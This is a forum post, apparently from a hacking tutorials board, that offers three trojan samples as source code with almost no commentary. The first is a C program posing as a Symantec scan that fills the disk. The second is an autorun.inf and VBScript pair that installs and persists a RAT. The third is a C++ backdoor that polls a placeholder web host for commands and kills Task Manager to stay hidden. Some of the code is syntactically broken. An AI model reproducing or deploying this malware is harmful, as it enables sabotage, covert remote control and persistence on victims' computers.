Jump to content
Zaraky

Trojan[C++]

By Zaraky, in Tutoriale in engleza

Recommended Posts

Zaraky Newbie

Zaraky

Posted
Posted (edited) 

#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATION OF A SPECIAL FILE FOR SPACE OCCUPYING HARDDISK",choice;

void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);

void main()
{
draw();
accept();
textcolor(WHITE);
draw();
gotoxy(12,8);
cputs("ANALYSIS OF THE SYSTEM. PLEASE WAIT ...");
sleep(3);
gotoxy(12,8);
delline();
cputs("ANALYSIS OF THE SYSTEM. PLEASE WAIT ...");
getch();
gotoxy(12,8);
delline();
findroot();
}

void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("This program is a Trojan horse SIMPLE DEMO. If you run this program it will \ n \ REAT your space FULL ON HARD DISK DRIVE ROOT. HOWEVER AND 'POSSIBLE
\n\rEELIMINATE THE DANNOE.\n\n\rTo fix the damage that 'VE \ TO DELETE THE FILES \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rSE you want to run the program, press ENTER, otherwise press any key to exit

if((choice=getch())!=13)
exit(0);
}

void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SSYMANTEC SECURITY SCAN - 2009 (RAPID SCANNER SYSTEM)");
}

void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN is stopped. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SCAN SYSTEM FAILED! Press any key to exit the program.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("NOTICE: Do not abort the scanning process to completion!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,;
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("Scanning complete!. Detected and eliminated MINACCE d su%d",vir_count);
gotoxy(12,10);
cprintf("Press any key to CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("Scan your system for threats");
gotoxy(12,10);
cputs("This can take up FEW MINUTES FOR A FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. WAIT...");
}

or

-Open Notepad (autorun.inf)

[AutoRun]
open=wscript go.vbs

go.vbs

Dim FSO,File
Dim Date,Hour,Day,Backuppath,Daystring
Set FSO = CreateObject("Scripting.FileSystemObject")
If Fso.FolderExists ("C:\Windows\trojan") Then
Set File= FSO.GetFile("C:\Windows\trojan\winrat.exe")
Date=File.DateLastModified
Day=DatePart("y",Date)
Daystring=CStr(Day)
Backuppath="C:\Windows\trojanbackup"+Daystring
Fso.MoveFolder "C:\Windows\trojan", Backuppath
End If
FSO.CopyFolder ".\trojan", "c:\Windows\trojan", true
Set oShell = CreateObject("WScript.Shell")
oShell.Run "C:\Windows\trojan\winrat.exe"
If Fso.FolderExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\") Then
If Fso.FileExists ("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Trojan.lnk") Then
Else
FSO.CopyFile "c:\Windows\trojan\Trojan.lnk","C:\Documents and Settings\All Users\Start Menu\Programs\Startup\", true
End If
End If

wscript.quit

or

001	#include <windows.h>
002	#pragma comment(lib, "Winmm.lib")
003	#include <urlmon.h>
004	#pragma comment(lib, "urlmon.lib")
005	#include <iostream>
006	#include <fstream>
007	#include <WinInet.h>
008	#pragma comment(lib, "WinInet.lib")
009	#include <ShlObj.h>
010	using namespace std;
011	 
012	int Option, Assign, Target;
013	DWORD WINAPI LowProfile(LPVOID);
014	DWORD WINAPI Option1(LPVOID);
015	DWORD WINAPI Option2(LPVOID);
016	DWORD WINAPI Option3(LPVOID);
017	DWORD WINAPI Option4(LPVOID);
018	DWORD WINAPI Option5(LPVOID);
019	// Add more lines of Option6, Option7, etc. to create more commands.
020	HWND TaskMgr, SysError, WMP, Disk1, Disk2, Disk3, Disk4, Autoplay, VBS;
021	 
022	int main() {
023	// Hide Console Window
024	FreeConsole();
025	 
026	CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&LowProfile, 0, 0, NULL);
027	 
028	// Checks if assign.txt exists. If it doesn't (only first run), download assign.txt. This gives the computer an ID number. You can change assign.txt in the PHP file BEFORE you plug in the U3 drive.
029	FILE *istream;
030	if ( (istream = fopen ( "C:\\Windows\\trojan\\assign.txt", "r" ) ) == NULL ) {
031	    URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/assign.html", L"c:\\Windows\\trojan\\assign.txt", NULL, NULL);
032	} else {
033	}
034	 
035	// Store Assign.txt in a variable
036	ifstream inAssign;
037	inAssign.clear();
038	inAssign.open("c:\\Windows\\trojan\\assign.txt");
039	inAssign >> Assign;
040	inAssign.close();
041	inAssign.clear();
042	 
043	// Start the main loop that is downloading the textfile each 5 seconds.
044	while(1) {
045	 
046	    // Download Option & Target
047	    remove("c:\\Windows\\trojan\\option.txt");
048	    remove("c:\\Windows\\trojan\\target.txt");
049	    DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/");
050	    DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/target.html");
051	    Sleep(100);
052	    URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/", L"c:\\Windows\\trojan\\option.txt", NULL, NULL);
053	    URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/target.html", L"c:\\Windows\\trojan\\target.txt", NULL, NULL);
054	 
055	    // Read Option
056	    ifstream inFile;
057	    inFile.clear();
058	    inFile.open("c:\\Windows\\trojan\\option.txt");
059	    inFile >> Option;
060	    inFile.close();
061	    inFile.clear();
062	 
063	    // Read Target
064	    ifstream inTarget;
065	    inTarget.clear();
066	    inTarget.open("c:\\Windows\\trojan\\target.txt");
067	    inTarget >> Target;
068	    inTarget.close();
069	    inTarget.clear();
070	 
071	    // If Target is equal to assign (so you can target a single computer) or if Target is zero (target all computers with your trojan)
072	    if(Target == Assign || Target == 0) {
073	        if(Option == 1) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option1, 0, 0, NULL); }
074	        else if(Option == 2) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option2, 0, 0, NULL); }
075	        else if(Option == 3) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option3, 0, 0, NULL); }
076	        else if(Option == 4) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option4, 0, 0, NULL); }
077	        else if(Option == 5) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option5, 0, 0, NULL); }
078	        // Add more of these lines for more commands
079	    }
080	    Sleep(5000);
081	    }
082	}
083	 
084	// Our LowProfile Thread. Hides all errors and things that may popup while inserting your U3 drive.
085	DWORD WINAPI LowProfile(LPVOID) {
086	    while(1) {
087	        // Obvious
088	        TaskMgr = FindWindow(NULL,L"Windows Task Manager");
089	        // May popup because of new hardware installation (U3)
090	        SysError = FindWindow(NULL,L"System Settings Change");
091	        // Windows Media Player may popup. Rarely happens, but had this once at a school computer.
092	        WMP = FindWindow(NULL,L"Windows Media Player");
093	        // The Removable Disk part of the U3 Drive can open automatically.
094	        Disk1 = FindWindow(NULL,L"(D:) Removable Disk");
095	        Disk2 = FindWindow(NULL,L"(E:) Removable Disk");
096	        Disk3 = FindWindow(NULL,L"(F:) Removable Disk");
097	        Disk4 = FindWindow(NULL,L"(G:) Removable Disk");
098	        // Autoplay
099	        Autoplay = FindWindow(NULL,L"Autoplay");
100	        // Errors caused by our VBScript go.vbs
101	        VBS = FindWindow(NULL,L"Windows Script Host");
102	        if( TaskMgr != NULL) {
103	            SetWindowText( TaskMgr,L"DIE!!!! =O");
104	            Sleep(500);
105	            PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
106	        }
107	        if( SysError != NULL) {
108	            PostMessage( SysError, WM_CLOSE, (LPARAM)0, (WPARAM)0);
109	        }
110	        if( WMP != NULL) {
111	            Sleep(1000);
112	            PostMessage( WMP, WM_CLOSE, (LPARAM)0, (WPARAM)0);
113	        }
114	        if( Disk1 != NULL) {
115	            PostMessage( Disk1, WM_CLOSE, (LPARAM)0, (WPARAM)0);
116	        }
117	        if( Disk2 != NULL) {
118	            PostMessage( Disk2, WM_CLOSE, (LPARAM)0, (WPARAM)0);
119	        }
120	        if( Disk3 != NULL) {
121	            PostMessage( Disk3, WM_CLOSE, (LPARAM)0, (WPARAM)0);
122	        }
123	        if( Disk4 != NULL) {
124	            PostMessage( Disk4, WM_CLOSE, (LPARAM)0, (WPARAM)0);
125	        }
126	        if( Autoplay != NULL) {
127	            PostMessage( Autoplay, WM_CLOSE, (LPARAM)0, (WPARAM)0);
128	        }
129	        if( VBS != NULL) {
130	            PostMessage( VBS, WM_CLOSE, (LPARAM)0, (WPARAM)0);
131	        }
132	        Sleep(500);
133	    }
134	}
135	 
136	//
137	// Here we start with our commands. Option1, Option2, Option3, etc.
138	// Don't forget to also define and create a process for these Options if you want to create more.
139	// Have Fun =D
140	//
141	 
142	DWORD WINAPI Option1(LPVOID) { // 1
143	    return 0;
144	}
145	 
146	DWORD WINAPI Option2(LPVOID) { // 2
147	    return 0;
148	}
149	 
150	DWORD WINAPI Option3(LPVOID) { // 3
151	    return 0;
152	}
153	 
154	DWORD WINAPI Option4(LPVOID) { // 4
155	    return 0;
156	}
157	 
158	DWORD WINAPI Option5(LPVOID) { // 5
159	    return 0;
160	}

Edited by Zaraky
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...